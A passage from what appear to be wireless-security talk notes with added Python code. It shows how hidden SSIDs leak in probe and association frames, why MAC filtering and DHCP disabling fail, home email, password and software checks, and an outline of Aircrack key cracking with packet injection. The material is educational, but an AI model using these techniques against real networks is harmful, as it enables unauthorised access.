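def parse_ies(data: bytes) -> List[Tuple[int, bytes]]:
    """Walk the tag/length/value list; a truncated trailing element is skipped."""
    ies, i = [], 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies.append((tag, data[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def ssid_of(frame: bytes) -> Tuple[int, Optional[str]]:
    """(subtype, SSID) for a management frame that carries an SSID element."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    frame_type, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if frame_type != 0 or subtype not in FIXED_LEN:
        return subtype, None
    body = frame[struct.calcsize(HEADER) + FIXED_LEN[subtype]:]
    for tag, value in parse_ies(body):
        if tag == IE_SSID:
            return subtype, value.decode("utf-8", errors="replace")
    return subtype, None


def ssid_leaks(frames: List[bytes]) -> Dict[str, Set[str]]:
    """Every non-empty SSID seen in the clear, with the frame kinds that exposed it."""
    seen: Dict[str, Set[str]] = {}
    for frame in frames:
        subtype, ssid = ssid_of(frame)
        if ssid:
            seen.setdefault(ssid, set()).add(NAME[subtype])
    return seen


def sample_capture() -> List[bytes]:
    """Constructed exchange: a 'hidden' beacon, then the client finding and
    joining the network by name, with the SSID in the clear each time."""
    ap, client, ssid = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "CorpWiFi"
    return [
        mgmt_frame(BEACON, BROADCAST, ap, ap, bytes(12) + ssid_ie("")),      # SSID "hidden"
        mgmt_frame(PROBE_REQ, BROADCAST, client, BROADCAST, ssid_ie(ssid)),  # client asks by name
        mgmt_frame(PROBE_RESP, client, ap, ap, bytes(12) + ssid_ie(ssid)),   # AP answers with it
        mgmt_frame(ASSOC_REQ, ap, client, ap, bytes(4) + ssid_ie(ssid)),
        mgmt_frame(REASSOC_REQ, ap, client, ap, bytes(10) + ssid_ie(ssid)),
    ]


if __name__ == "__main__":
    for name, kinds in ssid_leaks(sample_capture()).items():
        print(name, "seen in:", ", ".join(sorted(kinds)))
```

The beacon yields an empty name, but the very next frames from a client that knows the network hand the SSID to anyone listening; essid_jack, mentioned on the attacks slide, simply forces that exchange by deauthenticating a client and waiting for it to reconnect.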

MAC filtering: This is like handing a security guard a pad of paper with a list of names. When someone comes up to the door and wants entry, the security guard looks at the person's name tag, compares it to his list of names, and decides whether to open the door. Do you see the problem? All someone needs to do is watch an authorized person go in and forge a name tag with that person's name. In a wireless LAN the name tag is the MAC address. The MAC address is just a 12-digit hex number that can be viewed in clear text with a sniffer. A sniffer is to a hacker what a hammer is to a carpenter, except the sniffer is free. Once the MAC address is seen in the clear, it takes about 10 seconds to cut and paste a legitimate MAC address into the wireless Ethernet adapter settings, and the whole scheme is defeated. MAC filtering is absolutely worthless, since it is one of the easiest schemes to attack. The shocking thing is that so many large organizations still waste the time to implement it. The bottom line is that MAC filtering takes the most effort to manage with zero ROI (return on investment) in terms of security gain.

Home Networks

Disable DHCP

Antenna Placement


Disable DHCP: This is much more of a waste of time than it is a security break. DHCP allows the automatic assignment of IP addresses and other configuration. Disabling DHCP has zero security value and just wastes time. It would take a hacker about 10 seconds to figure out the IP scheme of any network and simply assign their own IP address. Anyone who tells you that this is a way to secure your wireless LAN doesn't know what they're talking about.

Antenna placement: I've heard the craziest things from so-called security experts who actually tell people to only put their Access Points in the center of their building and run them at minimal power. Antenna placement does nothing to deter hackers. Remember, the hacker will always have a bigger antenna than you, which can home in on you from a mile away. Making a wireless LAN so weak only serves to make the wireless LAN useless. Antenna placement and power output should be designed for maximum coverage and minimum interference. It should never be used as a security mechanism.

Home Networks Best Practices

You've heard it all before, but it's worth repeating.

Email-borne viruses and worms operate much the same way, except there are consequences, sometimes significant ones. Malicious email often contains a return address of someone we know and often has a provocative Subject line. This is social engineering at its finest – something we want to read from someone we know. Email viruses and worms are fairly common. If you’ve not received one, chances are you will. Here are steps you can use to help you decide what to do with every email message with an attachment that you receive. You should only read a message that passes all of these tests.

1. The Know test: Is the email from someone that you know?
2. The Received test: Have you received email from this sender before?
3. The Expect test: Were you expecting email with an attachment from this sender?
4. The Sense test: Does email from the sender with the contents as described in the Subject line and the name of the attachment(s) make sense? For example, would you expect the sender – let’s say your Mother – to send you an email message with the Subject line “Here you have, ;o)” that contains a message with attachment – let’s say AnnaKournikova.jpg.vbs? A message like that probably doesn’t make sense. In fact, it happens to be an instance of the Anna Kournikova worm, and reading it can damage your system.

Home Networks Best Practices

5. The Virus test: Does this email contain a virus? To determine this, you need to install and use an anti-virus program. That task is described in the section entitled Install and Use Anti-Virus Programs. You should apply these five tests – KRESV – to every piece of email with an attachment that you receive. If any test fails, toss that email. If they all pass, then you still need to exercise care and watch for unexpected results as you read it.
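As an added example (not from the original talk), the five KRESV tests written as a triage routine over constructed messages; the sender sets, the message layout and the `av_verdict` field standing in for the anti-virus scan are assumptions made for the example, and the Sense test is implemented as a check for attachment names whose final extension is executable (the `.jpg.vbs` double-extension trick from the talk).

```python
# File extensions that run as code when opened; a name like photo.jpg.vbs
# hides one of these behind a harmless-looking one. Constructed list.
EXECUTABLE_EXT = {"vbs", "exe", "scr", "pif", "bat", "cmd", "js", "com"}

def attachment_problem(name):
    """Sense test on one attachment name. Returns a reason string, or None."""
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None                      # no extension at all
    if parts[-1] in EXECUTABLE_EXT:
        if len(parts) > 2:               # e.g. ['annakournikova', 'jpg', 'vbs']
            return f"double extension hides executable .{parts[-1]}: {name}"
        return f"executable attachment .{parts[-1]}: {name}"
    return None

def kresv(msg, known, received_from, expected_from):
    """Return the KRESV tests the message fails (empty list = read with care).
    msg: dict with from, subject, attachments, av_verdict (assumed layout)."""
    sender = msg["from"].lower()
    failed = []
    if sender not in known:
        failed.append("Know")
    if sender not in received_from:
        failed.append("Received")
    if sender not in expected_from:
        failed.append("Expect")
    if any(attachment_problem(a) for a in msg["attachments"]):
        failed.append("Sense")
    if msg.get("av_verdict") == "infected":   # stands in for the AV scan
        failed.append("Virus")
    return failed

# Constructed sample messages mirroring the talk's example.
KNOWN = {"mother@example.test", "colleague@example.test"}
RECEIVED = {"mother@example.test", "colleague@example.test"}
EXPECTED = {"colleague@example.test"}
WORM_MAIL = {"from": "mother@example.test", "subject": "Here you have, ;o)",
             "attachments": ["AnnaKournikova.jpg.vbs"], "av_verdict": "infected"}
BUDGET_MAIL = {"from": "colleague@example.test", "subject": "Q3 budget",
               "attachments": ["budget.xlsx"], "av_verdict": "clean"}
```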

1. The Strong test: Is the password as strong (meaning length and content) as the rules allow?
2. The Unique test: Is the password unique and unrelated to any of your other passwords?
3. The Practical test: Can you remember it without having to write it down?
4. The Recent test: Have you changed it recently?

In spite of the SUPR tests, you need to be aware that sniffing happens, and even the best of passwords can be captured and used by an intruder. You should use passwords not only on your home computer but also for services you use elsewhere on the Internet. All should have the strongest passwords you can use and remember, and each password should be unique and unrelated to all other passwords. A strong password is a password that is longer than it is short, that uses combinations of uppercase and lowercase letters, numbers, and punctuation, and that is usually not a word found in a dictionary.

Home Networks Best Practices

So then, how do you decide if a program is worth it? To decide if you should install and run a program on your home computer, follow these steps:

1. The Do test: What does the program do? You should be able to read a clear description of what the program does. This description could be on the web site where you can download it or on the CD-ROM you use to install it. You need to realize that if the program was written with malicious intent, the author/intruder isn’t going to tell you that the program will harm your system. They will probably try to mislead you. So, learn what you can, but consider the source and consider whether you can trust that information.
2. The Changes test: What files are installed and what other changes are made on your system when you install and run the program? Again, to do this test, you may have to ask the author/intruder how their program changes your system. Consider the source.
3. The Author test: Who is the author? (Can you use email, telephone, letter, or some other means to contact them?) Once you get this information, use it to try to contact them to verify that the contact information works. Your interactions with them may give you more clues about the program and its potential effects on your computer and you.

Home Networks Best Practices

4. The Learn test: Has anybody else used this program, and what can you learn from him or her? Try some Internet searches using your web browser. Somebody has probably used this program before you, so learn what you can before you install it.

If you can’t determine these things – the DCAL tests for short – about the program you’d like to install, then strongly consider whether it’s worth the risk. Only you can decide what’s best. Whatever you do, be prepared to rebuild your computer from scratch in case the program goes awry and destroys it.

Public Internet Computers

Firewall

HD Encryption

Turn off wireless

Erase your tracks

Windows Vista and Windows XP SP2 have the firewall turned on by default.

Encrypt your data with Windows XP Professional.

Your data should be encrypted on your hard drive, not only to protect against unauthorized access to your mobile device's drive, but also in case the mobile device is lost.

Always log out of web sites by clicking "log out" on the site.

It's not enough to simply close the browser window or type in another address.

Many programs include automatic login features that will save your user name and password. Disable this option so no one can log in as you.

Disable web browser features that store passwords.

Tools

Kismet

Airshark

Bluetooth Dongle

Yagi Antenna

Kismet: open-source tool; reads out the names of networks as they are discovered (a nice eyes-free feature for drivers), can dump printable strings (which may include passwords), produce a list of networks as a CSV file, and dump packets for WEP key finding.

Airshark, NetStumbler. Bluetooth can be sniffed from afar; a Yagi is not just for Wi-Fi cards.

Wi-Fi Discovery Tools: Aerosol, Airsnort, AP Radar, Boingo Software, DStumbler, KisMAC, iStumbler, MacStumbler, MiniStumbler, NetChaser, NetStumbler, PCTEL Roaming Client, PrismStumbler, T-Mobile Connection Manager, WaveStumbler, Wellenreiter, WiFiFoFum, WiStumbler

Wi-Fi Raw Packet Capture Tools: AirPcap, ettercap, libpcap, Prism2Dump, tcpdump

Wi-Fi Traffic Analyzers: AirDefense Mobile, AirMagnet Laptop and Handheld Analyzers, BVS YellowJacket, BSD-AirTools, Aruba Networks RFprotect Mobile, Cambridge vxSniffer, Fluke Networks OptiView and EtherScope, Javvin Network Packet Analyzer, Kismet, Mognet, Network Chemistry Packetyzer, Network General Sniffer Portable/Mobile, Network Instruments Network Observer, TamoSoft CommView for Wi-Fi, WildPackets OmniPeek

Tools

GPS

Bluetooth Dongle

Yagi Antenna


LINUX - UBUNTU

DEDICATED LAPTOPS

TOOLS

Tools - Sample Screens

Aircrack

Aircrack—Step 1 (Enable adapter into monitor mode using airmon-ng)


Aircrack—Step 2 (Packet capture with airodump; when you are using the aircrack suite, this is the “main” screen you watch)


Aircrack—Step 3 (Packet replay attack using injection with aireplay-ng, designed to speed up the data capture process)


Aircrack—Step 4 (Packet replay attack using injection with aireplay-ng; this is what it looks like when the packets get rolling)


Aircrack—Step 5 (Cracking the Key)

INTERNAL SCAN

TOOLS IBM INTERNET SCANNER

For external and internal scans.

Guest Accounts


Oops


THANK YOU.
